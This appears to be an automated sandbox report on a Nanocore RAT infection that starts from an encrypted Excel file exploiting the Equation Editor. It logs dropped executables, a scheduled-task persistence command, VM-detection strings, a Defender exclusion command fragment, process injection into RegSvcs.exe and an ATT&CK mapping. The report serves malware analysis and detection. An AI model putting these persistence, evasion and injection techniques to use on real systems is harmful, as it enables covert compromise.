        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
        Source: Binary string: System.EnterpriseServices.Wrapper.pdb source: smtpsvc.exe, 00000008.00000002.2204591291.0000000001CE0000.00000002.00000001.sdmp
        Source: Binary string: RegSvcs.pdb source: smtpsvc.exe, smtpsvc.exe.7.dr
        Source: Binary string: Z089\mscorlib.pdbmeUIXaml, source: RegSvcs.exe, 00000007.00000002.2364831026.0000000000787000.00000004.00000020.sdmp
        Source: Files Specification.xlsxInitial sample: OLE indicators vbamacros = False
        Source: Files Specification.xlsxInitial sample: OLE indicators encrypted = True
        Source: initial sampleStatic PE information: section name: .text entropy: 7.5077416615
        Source: initial sampleStatic PE information: section name: .text entropy: 7.5077416615
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\loki[1].exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Source: C:\Users\Public\vbc.exeFile created: C:\Users\user\AppData\Roaming\tHyARuOEdFlN.exeJump to dropped file
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile created: C:\Program Files (x86)\SMTP Service\smtpsvc.exeJump to dropped file
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file

        Boot Survival:

        barindex
        Drops PE files to the user root directoryShow sources
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEFile created: C:\Users\Public\vbc.exeJump to dropped file
        Uses schtasks.exe or at.exe to add and modify task schedulesShow sources
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tHyARuOEdFlN' /XML 'C:\Users\user\AppData\Local\Temp\tmp4C3D.tmp'

        Hooking and other Techniques for Hiding and Protection:

        barindex
        Hides that the sample has been downloaded from the Internet (zone.identifier)Show sources
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeFile opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe:Zone.Identifier read attributes | delete
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Users\Public\vbc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeProcess information set: NOOPENFILEERRORBOX
        Source: Files Specification.xlsxStream path 'EncryptedPackage' entropy: 7.99990846905 (max. 8.0)

        Malware Analysis System Evasion:

        barindex
        Yara detected AntiVM3Show sources
        Source: Yara matchFile source: 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2488, type: MEMORY
        Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)Show sources
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: SBIEDLL.DLL
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 8620
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeWindow / User API: threadDelayed 1143
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE TID: 2412Thread sleep time: -360000s >= -30000s
        Source: C:\Users\Public\vbc.exe TID: 2452Thread sleep time: -99203s >= -30000s
        Source: C:\Users\Public\vbc.exe TID: 2232Thread sleep time: -60000s >= -30000s
        Source: C:\Users\Public\vbc.exe TID: 3036Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exe TID: 2348Thread sleep time: -922337203685477s >= -30000s
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 99203
        Source: C:\Users\Public\vbc.exeThread delayed: delay time: 922337203685477
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeThread delayed: delay time: 922337203685477
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeThread delayed: delay time: 922337203685477
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: vmware
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
        Source: vbc.exe, 00000004.00000002.2175069968.0000000000390000.00000004.00000001.sdmpBinary or memory string: \\?\IDE#CdRomNECVMWar_VMware_SATA_CD01_______________1.00____#6&373888b8&0&1.0.0#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{8a079453-cd11-11ea-a1d0-806e6f6e6963}#0000000006500000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}]
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II!Add-MpPreference -ExclusionPath "
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: VMWARE
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: VMware SVGA II
        Source: vbc.exe, 00000004.00000002.2177046029.00000000025E7000.00000004.00000001.sdmpBinary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000
        Source: C:\Users\Public\vbc.exeProcess information queried: ProcessInformation
        Source: C:\Users\Public\vbc.exeProcess token adjusted: Debug
        Source: C:\Users\Public\vbc.exeMemory allocated: page read and write | page guard

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        Allocates memory in foreign processesShow sources
        Source: C:\Users\Public\vbc.exeMemory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 protect: page execute and read and write
        Injects a PE file into a foreign processesShow sources
        Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000 value starts with: 4D5A
        Writes to foreign memory regionsShow sources
        Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 400000
        Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 402000
        Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 420000
        Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 422000
        Source: C:\Users\Public\vbc.exeMemory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe base: 7EFDE008
        Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXEProcess created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\SysWOW64\schtasks.exe 'C:\Windows\System32\schtasks.exe' /Create /TN 'Updates\tHyARuOEdFlN' /XML 'C:\Users\user\AppData\Local\Temp\tmp4C3D.tmp'
        Source: C:\Users\Public\vbc.exeProcess created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
        Source: RegSvcs.exe, 00000007.00000002.2365233782.00000000025C9000.00000004.00000001.sdmpBinary or memory string: Program Manager48
        Source: RegSvcs.exe, 00000007.00000002.2365233782.00000000025C9000.00000004.00000001.sdmpBinary or memory string: Program Manager
        Source: RegSvcs.exe, 00000007.00000002.2367306587.000000000656E000.00000004.00000001.sdmpBinary or memory string: -TProgram Manager|
        Source: RegSvcs.exe, 00000007.00000002.2364945704.0000000000D00000.00000002.00000001.sdmpBinary or memory string: Shell_TrayWnd
        Source: RegSvcs.exe, 00000007.00000002.2366966260.000000000587D000.00000004.00000001.sdmpBinary or memory string: -TProgram Manager
        Source: RegSvcs.exe, 00000007.00000002.2364945704.0000000000D00000.00000002.00000001.sdmpBinary or memory string: !Progman
        Source: RegSvcs.exe, 00000007.00000002.2367222642.000000000610D000.00000004.00000001.sdmpBinary or memory string: -TProgram Manager`/
        Source: C:\Users\Public\vbc.exeQueries volume information: C:\Users\Public\vbc.exe VolumeInformation
        Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exeQueries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Program Files (x86)\SMTP Service\smtpsvc.exe VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\assembly\NativeImages_v4.0.30319_32\System.Ente96d83b35#\692ae41749625908a626fd813aa21688\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Program Files (x86)\SMTP Service\smtpsvc.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.EnterpriseServices\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.EnterpriseServices.Wrapper.dll VolumeInformation
        Source: C:\Users\Public\vbc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid

        Stealing of Sensitive Information:

        barindex
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000007.00000002.2365145581.0000000002501000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2365691956.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2364660663.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2364705666.0000000000500000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2177374550.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2200, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2488, type: MEMORY
        Source: Yara matchFile source: 7.2.RegSvcs.exe.354fb0c.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.354fb0c.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.vbc.exe.364dd28.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.504629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.500000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.vbc.exe.364dd28.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.500000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.354acd6.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.3554135.9.raw.unpack, type: UNPACKEDPE

        Remote Access Functionality:

        barindex
        Detected Nanocore RatShow sources
        Source: vbc.exe, 00000004.00000002.2177374550.00000000035AC000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000007.00000002.2365145581.0000000002501000.00000004.00000001.sdmpString found in binary or memory: NanoCore.ClientPluginHost
        Source: RegSvcs.exe, 00000007.00000002.2365145581.0000000002501000.00000004.00000001.sdmpString found in binary or memory: <Module>mscorlibMicrosoft.VisualBasicMyApplicationNanoCore.MyMyComputerMyProjectMyWebServicesThreadSafeObjectProvider`1IClientNetworkNanoCore.ClientPluginIClientDataIClientAppIClientDataHostNanoCore.ClientPluginHostIClientNetworkHostIClientUIHostIClientLoggingHostIClientAppHostIClientNameObjectCollectionNanoCoreIClientReadOnlyNameObjectCollectionClientInvokeDelegateMicrosoft.VisualBasic.ApplicationServicesApplicationBase.ctorMicrosoft.VisualBasic.DevicesComputerSystemObject.cctorget_Computerm_ComputerObjectProviderget_Applicationm_AppObjectProviderUserget_Userm_UserObjectProviderget_WebServicesm_MyWebServicesObjectProviderApplicationWebServicesEqualsoGetHashCodeTypeGetTypeToStringCreate__Instance__TinstanceDispose__Instance__get_GetInstanceMicrosoft.VisualBasic.MyServices.InternalContextValue`1m_ContextGetInstanceReadPacketpipeNameparamsPipeCreatedPipeClosedConnectionStateChangedconnectedConnectionFailedhostportBuildingHostCacheVariableChangednameClientSettingChangedPluginUninstallingClientUninstallingget_Variablesget_ClientSettingsget_BuilderSettingsVariablesClientSettingsBuilderSettingsget_ConnectedClosePipePipeExistsRebuildHostCacheAddHostEntryDisconnectSendToServercompressConnectedInvokemethodstateLogClientMessagemessageExceptionLogClientExceptionexsiteRestartShutdownDisableProtectionRestoreProtectionUninstallEntryExistsSystem.Collections.GenericKeyValuePair`2GetEntriesGetValuedefaultValueSetValuevalueRemoveValueMulticastDelegateTargetObjectTargetMethodIAsyncResultAsyncCallbackBeginInvokeDelegateCallbackDelegateAsyncStateEndInvokeDelegateAsyncResultSystem.ComponentModelEditorBrowsableAttributeEditorBrowsableStateSystem.CodeDom.CompilerGeneratedCodeAttributeSystem.DiagnosticsDebuggerHiddenAttributeMicrosoft.VisualBasic.CompilerServicesStandardModuleAttributeHideModuleNameAttributeSystem.ComponentModel.DesignHelpKeywordAttributeSystem.Runtime.CompilerServicesRuntimeHelpersGetObjectValueRuntimeTypeHandleGetTypeFromHandleActivatorCreateInstanceMyGroupCollectionAttributeget_Valueset_ValueSystem.Runtime.InteropServicesComVisibleAttributeParamArrayAttributeCompilationRelaxationsAttributeRuntimeCompatibilityAttributeSystem.ReflectionAssemblyFileVersionAttributeGuidAttributeAssemblyTrademarkAttributeAssemblyCopyrightAttributeAssemblyProductAttributeAssemblyCompanyAttributeAssemblyDescriptionAttributeAssemblyTitleAttributeClientPluginClientPlugin.dll
        Yara detected Nanocore RATShow sources
        Source: Yara matchFile source: 00000007.00000002.2365145581.0000000002501000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2365691956.0000000003549000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2364660663.0000000000402000.00000040.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000007.00000002.2364705666.0000000000500000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2177374550.00000000035AC000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: RegSvcs.exe PID: 2200, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: vbc.exe PID: 2488, type: MEMORY
        Source: Yara matchFile source: 7.2.RegSvcs.exe.354fb0c.8.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.354fb0c.8.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.vbc.exe.364dd28.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.504629.3.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.500000.4.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 4.2.vbc.exe.364dd28.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.500000.4.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.400000.0.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.354acd6.10.raw.unpack, type: UNPACKEDPE
        Source: Yara matchFile source: 7.2.RegSvcs.exe.3554135.9.raw.unpack, type: UNPACKEDPE

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsExploitation for Client Execution13Scheduled Task/Job1Extra Window Memory Injection1Disable or Modify Tools1Input Capture11File and Directory Discovery1Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumIngress Tool Transfer12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsCommand and Scripting Interpreter1Boot or Logon Initialization ScriptsProcess Injection312Obfuscated Files or Information21LSASS MemorySystem Information Discovery13Remote Desktop ProtocolInput Capture11Exfiltration Over BluetoothEncrypted Channel1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsScheduled Task/Job1Logon Script (Windows)Scheduled Task/Job1Software Packing2Security Account ManagerSecurity Software Discovery21SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Standard Port1Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Extra Window Memory Injection1NTDSProcess Discovery2Distributed Component Object ModelInput CaptureScheduled TransferRemote Access Software1SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptMasquerading112LSA SecretsVirtualization/Sandbox Evasion21SSHKeyloggingData Transfer Size LimitsNon-Application Layer Protocol2Manipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonVirtualization/Sandbox Evasion21Cached Domain CredentialsApplication Window Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelApplication Layer Protocol122Jamming or Denial of ServiceAbuse Accessibility Features
